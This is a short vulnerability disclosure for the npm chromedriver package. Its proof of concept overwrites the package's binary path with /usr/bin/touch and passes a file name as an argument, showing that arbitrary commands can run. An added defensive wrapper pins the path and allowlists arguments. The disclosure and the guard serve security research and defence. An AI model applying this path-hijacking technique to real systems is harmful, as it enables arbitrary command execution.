@mcoimbra
Created October 26, 2023 17:02
Package chromedriver: possible to do command injection by manipulating the arguments.
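'use strict';
const chromedriver = require('chromedriver');
// These arguments end up on the command line of whatever binary chromedriver.path names.
const args = ['exploited.txt'];
const returnPromise = false;
// The binary path is a writable property; here it is pointed at touch instead of ChromeDriver.
chromedriver.path = '/usr/bin/touch';
// This creates a local 'exploited.txt' file.
chromedriver.start(args, returnPromise);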
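
A caller-side guard against the behaviour shown above, as an added example that is not part of the original gist or of the chromedriver package. `makeGuardedStart`, the argument allowlist and the stub module object are hypothetical and constructed for illustration; the wrapper assumes it is created immediately after `require('chromedriver')`, before any untrusted code can touch the module object.

```javascript
'use strict';

// Assumed allowlist of ChromeDriver flags this application needs; extend deliberately.
const ALLOWED_ARGS = [
  /^--port=\d{1,5}$/,
  /^--url-base=[\w\/-]+$/,
  /^--verbose$/,
  /^--silent$/,
];

// Hypothetical helper: pin the binary path once, then refuse to start if the
// path was changed afterwards or if any argument is not on the allowlist.
function makeGuardedStart(driver) {
  const pinnedPath = String(driver.path);
  return function guardedStart(args = [], returnPromise = false) {
    if (driver.path !== pinnedPath) {
      throw new Error(`chromedriver.path changed: ${driver.path}`);
    }
    const bad = args.filter(
      (a) => typeof a !== 'string' || !ALLOWED_ARGS.some((re) => re.test(a))
    );
    if (bad.length > 0) {
      throw new Error(`unexpected arguments: ${JSON.stringify(bad)}`);
    }
    return driver.start(args, returnPromise);
  };
}

// Constructed stand-in for the chromedriver module so the example runs offline.
function demo() {
  const stub = {
    path: '/opt/app/node_modules/chromedriver/lib/chromedriver/chromedriver',
    start(args) { return { spawned: this.path, args }; },
  };
  const original = stub.path;
  const start = makeGuardedStart(stub);
  const attempt = (args) => {
    try { return start(args).spawned; } catch (e) { return e.message; }
  };
  const results = { ok: attempt(['--port=9515']) };
  stub.path = '/usr/bin/touch';            // the reassignment from the gist
  results.tampered = attempt(['exploited.txt']);
  stub.path = original;                    // path intact, argument still untrusted
  results.badArg = attempt(['exploited.txt']);
  return results;
}

console.log(demo());
```

In a real application, pass the object returned by `require('chromedriver')` to `makeGuardedStart` and call only the returned function.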